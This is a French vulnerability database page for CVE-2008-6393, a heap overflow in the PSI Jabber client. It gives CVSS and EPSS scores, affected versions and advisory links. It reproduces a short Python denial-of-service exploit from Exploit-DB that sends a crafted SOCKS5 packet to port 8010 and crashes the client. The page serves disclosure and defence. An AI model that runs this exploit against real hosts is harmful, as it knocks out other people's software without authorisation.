CVE-2008-6393 : Détail

CVE-2008-6393

26.54%V4
Network
2009-03-03
15h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

PSI Jabber client before 0.12.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a file transfer request with a negative value in a SOCKS5 option, which bypasses a signed integer check and triggers an integer overflow and a heap-based buffer overflow.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 7555

Date de publication : 2008-12-22 23h00 +00:00
Auteur : Sha0
EDB Vérifié : Yes

#!/usr/bin/python #psi jabber client 8010/tcp remote denial of service (win & lin) #by sha0[at]badchecksum.net #http://jolmos.blogspot.com import socket, sys sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: sock.connect((sys.argv[1],8010)) except: print 'Cannot connect!' sys.exit(1) try: sock.send('\x05\xff') print 'Crashed!' except: print 'Cannot send!' sock.close() # milw0rm.com [2008-12-23]

Products Mentioned

Configuraton 0

Psi-im>>Psi >> Version To (including) 0.12

    Psi-im>>Psi >> Version 0.1.0

      Psi-im>>Psi >> Version 0.8.6

        Psi-im>>Psi >> Version 0.8.7

          Psi-im>>Psi >> Version 0.9

            Psi-im>>Psi >> Version 0.9.1

              Psi-im>>Psi >> Version 0.9.2

                Psi-im>>Psi >> Version 0.9.3

                  Psi-im>>Psi >> Version 0.11

                    Jabber>>Jabber_client >> Version *

                      Références

                      http://secunia.com/advisories/34259
                      Tags : third-party-advisory, x_refsource_SECUNIA
                      http://secunia.com/advisories/34301
                      Tags : third-party-advisory, x_refsource_SECUNIA
                      https://www.exploit-db.com/exploits/7555
                      Tags : exploit, x_refsource_EXPLOIT-DB
                      http://www.securityfocus.com/archive/1/499563
                      Tags : mailing-list, x_refsource_BUGTRAQ
                      http://www.openwall.com/lists/oss-security/2009/02/25/5
                      Tags : mailing-list, x_refsource_MLIST
                      http://secunia.com/advisories/33311
                      Tags : third-party-advisory, x_refsource_SECUNIA
                      http://www.debian.org/security/2009/dsa-1741
                      Tags : vendor-advisory, x_refsource_DEBIAN
                      http://secunia.com/advisories/34119
                      Tags : third-party-advisory, x_refsource_SECUNIA